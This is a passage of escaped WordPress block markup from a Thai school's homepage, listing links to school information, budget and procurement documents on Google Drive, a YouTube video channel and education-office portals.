900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 